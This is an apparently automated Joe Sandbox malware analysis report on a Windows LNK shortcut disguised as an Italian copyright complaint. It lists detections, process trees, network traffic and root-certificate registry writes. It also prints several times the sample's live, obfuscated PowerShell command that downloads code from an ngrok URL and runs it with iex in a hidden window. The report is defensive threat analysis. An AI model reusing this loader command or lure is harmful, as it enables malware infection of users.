Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk

Overview

General Information

Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
Analysis ID:1578153
MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
SHA1:1376441bc8171553125dac0415240a81859ee8f7
SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Installs new ROOT certificates
Machine Learning detection for sample
PowerShell case anomaly found
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w7x64
  • cmd.exe (PID: 3388 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • powershell.exe (PID: 3444 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3388, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 3444, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 3388, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3388, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 3444, ProcessName: powershell.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3444, TargetFilename: C:\Users\user\AppData\Local\Temp\3imrgudy.doa.ps1
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 39%Perma Link
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 3.6.115.182:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: Joe Sandbox ViewIP Address: 3.6.115.182 3.6.115.182
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 3.6.115.182:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: 5awvoe1sr8b6b5g9cfxz.ngrok.app
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainNgrok-Error-Code: ERR_NGROK_3200Date: Thu, 19 Dec 2024 09:36:36 GMTContent-Length: 67
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkString found in binary or memory: https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

System Summary

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: classification engineClassification label: mal80.winLNK@3/3@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\3imrgudy.doa.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P).............................}..w..............D.......D......1D.....(.P.......D......3D.............p........At.............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm).......................yk....}..w.....At.....\.F.......D.............(.P.....L.......T.......x...............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................E.R.R._.N.G.R.O.K._.3.2.0.0..... .e.......yk......d.....(.P.....L.......T.......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm).......................yk....}..w.....At.....\.F.......D.............(.P.....L.......T.......x...............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.e.......yk......d.....(.P.....L.......T...............".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................At.....}..w............ .e.......yk......d.....(.P.....L.......T.......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................At.....}..w............ .e.......yk......d.....(.P.....L.......T.......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................At.....}..w............ .e.......yk......d.....(.P.....L.......T.......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................At.....}..w............ .e.......yk......d.....(.P.....L.......T...............b.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................At.....}..w............ .e.......yk......d.....(.P.....L.......T.......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.............L.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 39%
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
